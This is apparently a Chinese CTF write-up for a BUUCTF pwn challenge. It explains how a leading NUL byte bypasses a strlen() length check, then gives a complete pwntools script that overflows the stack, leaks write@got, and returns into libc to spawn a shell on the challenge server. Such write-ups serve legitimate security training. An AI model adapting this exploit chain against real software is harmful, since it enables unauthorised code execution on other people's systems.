保护
ida
s 是随机值，不可能让输入的 buf 与 s 相等，因此改为利用字符串截断：在 buf 开头放一个 \x00，strlen() 遇到前导 \x00 就停止计数，而后面的字节依然被写进了 buf，从而绕过基于 strlen() 的检查。
注意程序随后执行的 buf[v5-1]=0 会改写 buf 中对应位置的字节，构造 payload 时要把这一修改考虑进去。
让 buf[7] 尽量大（最大为 \xff，即 255），后续读入的数据量便足以造成栈溢出。
准备 无
exp
from pwn import*
from LibcSearcher3 import*
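# Exploit flow: strlen() bypass -> ret2plt leak of write@got -> ret2libc
# system("/bin/sh").  Toggle local/remote target below; keep the unused
# one commented out.
context.log_level = "debug"
elf = ELF("/home/error/桌面/pwn")
# i = process("/home/error/桌面/pwn")
i = remote("node4.buuoj.cn", 29715)

# Stage 1: bypass the strlen()-based length check.
# The leading NUL makes strlen() report an empty string while the bytes
# after it are still written into buf; buf[7] = 0xff is the large value
# that later lets the program read enough data to overflow the stack.
# sendline() appends "\n" after the 8 bytes — presumably the byte the
# program's buf[v5-1] = 0 zeroes (confirm against the disassembly).
p1 = b"\x00" + b"a" * 6 + b"\xff"  # the layout of this payload is the key point
i.sendline(p1)
i.recvline()

# Stage 2: leak libc.  Overwrite the saved return address with write@plt,
# return to main afterwards so the overflow can be triggered a second
# time, and call write(1, write@got, 4) to dump write()'s libc address.
write_plt = elf.plt["write"]
write_got = elf.got["write"]
main = 0x08048825   # main() address taken from IDA; valid only because the binary is loaded at a fixed address (no PIE assumed)
OFFSET = 0xE7 + 4   # bytes from buf to the saved return address (buf presumably at ebp-0xE7, +4 skips saved EBP)
p2 = cyclic(OFFSET) + flat([write_plt, main, 1, write_got, 4])
i.sendline(p2)
# recvn() blocks until exactly 4 bytes arrive.  recv(4) returns *up to*
# 4 bytes, and on a short read u32() would raise on the partial leak.
write_addr = u32(i.recvn(4))
print(hex(write_addr))

# Stage 3: resolve the libc build from the leak and return to
# system("/bin/sh").  The fake return address after system is 0: the
# shell is spawned before system() ever returns, so it is never used.
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
sys_addr = libc_base + libc.dump("system")
she_addr = libc_base + libc.dump("str_bin_sh")
p3 = cyclic(OFFSET) + flat([sys_addr, 0, she_addr])
i.sendline(p1)  # main() restarted from scratch, so the strlen() bypass must be replayed first
i.sendline(p3)
i.interactive()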
结果